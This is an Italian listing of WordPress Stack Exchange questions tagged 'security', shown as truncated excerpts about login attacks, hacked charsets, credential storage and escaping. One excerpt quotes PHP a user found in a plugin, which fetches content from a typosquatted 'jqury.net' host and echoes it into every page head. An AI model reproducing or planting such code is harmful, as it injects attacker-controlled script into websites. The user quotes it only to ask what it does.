WordPress security

3

Aumento dei tentativi di accesso non riusciti, attacchi di forza bruta? [chiuso]

Chiuso. Questa domanda è fuori tema . Al momento non accetta risposte. Vuoi migliorare questa domanda? Aggiorna la domanda in modo che sia in argomento per lo scambio di stack di sviluppo di WordPress. Chiuso 4 anni fa . Ho installato il plug-in Simple Login Lockdown e da un paio …

20 login security

2

Se un hacker ha cambiato blog_charset in UTF-7, questo rende WordPress vulnerabile a ulteriori attacchi?

Ho avuto un cliente che è stato violato di recente e ho notato che c'erano strani personaggi sul suo sito, come Â e Æ. Si scopre che gli hacker hanno cambiato blog_charset in UTF-7 nella wp_optionstabella nel database. L'ho ripristinato su UTF-8, ma mi chiedevo se durante il periodo in …

19 security encoding hacked characters

6

I plugin di Wordpress sono essenziali?

Sono nuovo di WordPress. Di recente ho letto un articolo su come gli hacker possono sfruttare le vulnerabilità nei plugin. Varie fonti come Google Pagespeed mi hanno anche dissuaso dall'uso dei plugin o almeno per ridurlo al minimo. Personalmente, cerco anche di evitare i plug-in perché mi sento più in …

19 plugins security

3

Come archiviare nome utente e password nell'API nel DB di opzioni wordpress?

Attualmente sto sviluppando un plugin e le probabilità sono che molto probabilmente lo rilascerò sul repository di plugin pubblico in modo che altri possano usarlo. Il plugin utilizzerà un'API e per utilizzare questa API è necessario passare un nome utente e una password. Quindi il mio plugin deve archiviare queste …

19 plugin-development security api encryption

2

L'ho trovato in un plugin. Che cosa fa? è pericoloso?

L'ho trovato in un plugin. Che cosa fa? è pericoloso? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins wp-admin security curl

2

In quali contesti i plugin sono responsabili della convalida / sanificazione dei dati?

Voglio assicurarmi che tutti i dati nei miei plugin / temi siano gestiti in modo sicuro prima di accedere al database e prima di essere inviati al browser. Il mio problema è che ci sono situazioni in cui l'API gestisce la sanificazione per te - come quando si salvano i …

17 plugin-development security customization validation sanitization

2

Devo rimuovere install.php e install-helper.php?

Mantenere wp-admin/install.phpe wp-admin/install-helper.phpuna perdita di sicurezza sulle nuove versioni di wordpress? Per impostazione predefinita, le autorizzazioni sui file sono 644. Se c'è qualche perdita, che tipo di per favore?

16 security installation

3

Quali sono i difetti di sicurezza comuni che devo cercare? [chiuso]

Allo stato attuale, questa domanda non è adatta al nostro formato di domande e risposte. Ci aspettiamo che le risposte siano supportate da fatti, riferimenti o competenze, ma questa domanda probabilmente solleciterà dibattiti, argomenti, sondaggi o discussioni estese. Se ritieni che questa domanda possa essere migliorata e possibilmente riaperta, visita …

16 plugins plugin-development security sql

1

Per quali motivi di sicurezza vengono bloccati gli svgs nell'uploader multimediale?

Vedo che gli SVG sono bloccati di default nel file uploader multimediale e devi aggiungerlo come tipo MIME supportato in Functions.php. Quali ragioni di sicurezza sono alla base di questo?

15 media security svg

3

Dovrei sfuggire a wordpress come the_title, the_excerpt, the_content

Ho guardato il codice ma non sono riuscito a scappare da funzioni come the_title the_content the_excerptecc. Potrei non leggerlo nel modo giusto. Devo sfuggire a queste funzioni nello sviluppo di temi come: esc_html ( the_title () ) Modifica: come sottolineato nelle risposte sotto il codice sopra è sbagliato a prescindere …

15 security escaping

4

Come funziona admin-ajax.php?

Stiamo riscontrando alcuni problemi con uno sviluppatore esterno. Vogliamo limitare l'accesso al wp-adminsito solo all'accesso interno (tramite VPN ). Semplicemente, non verrà attaccato da utenti esterni. Possiamo enumerare gli amministratori dal sito e non vogliamo che vengano phishing. Il nostro sviluppatore sta dicendo che non possiamo farlo perché il sito …

14 admin ajax security

3

Impedisci l'accesso o elimina automaticamente readme.html, license.txt, wp-config-sample.php

Solo una domanda veloce che potrebbe aiutare un po 'con la sicurezza. Ho notato che il file readme.html ha il numero di versione elencato. Riappare dopo ogni aggiornamento, così come licence.txt e wp-config-sample.php. C'è un modo semplice per fare in modo che WordPress rimuova automaticamente questi file dopo un aggiornamento? …

13 security wp-config

1

Perché WordPress ha bisogno della mia chiave ssh privata per l'aggiornamento?

Configurare WordPress per l'aggiornamento all'interno dell'applicazione (cioè WordPress) è l'ideale per me per la sua praticità. Tuttavia, sono turbato dai requisiti. I campi richiesti che compaiono dopo l' installazione di ssh2 per php richiedono non solo la mia chiave pubblica, ma anche la mia chiave privata. Penso che al massimo …

13 security updates ssh

1

Quanto è sicuro / igienizzato wp_insert_posts ()?

Guardando il Codice per wp_insert_post () si afferma che questa funzione "... sanifica le variabili, esegue alcuni controlli, riempie le variabili mancanti come data / ora, ecc." (EDIT: ho aggiornato la voce del Codex per includere un esempio più solido che include sicurezza, post meta e assegnazione di categorie) Mi …

13 security sanitization

4

Perché dovrei usare esc_url?

Questa cosa rende difficile la mia codifica. Il codice Wordpress spiega l'uso di esc_url parlando vagamente di sicurezza. Ma vale davvero la pena? Ad esempio, qual è il vantaggio pratico e importante per la sicurezza che utilizza <?php echo esc_url( home_url( '/' ) ); ?> invece di <?php echo home_url() …

12 security

Domande taggate «security»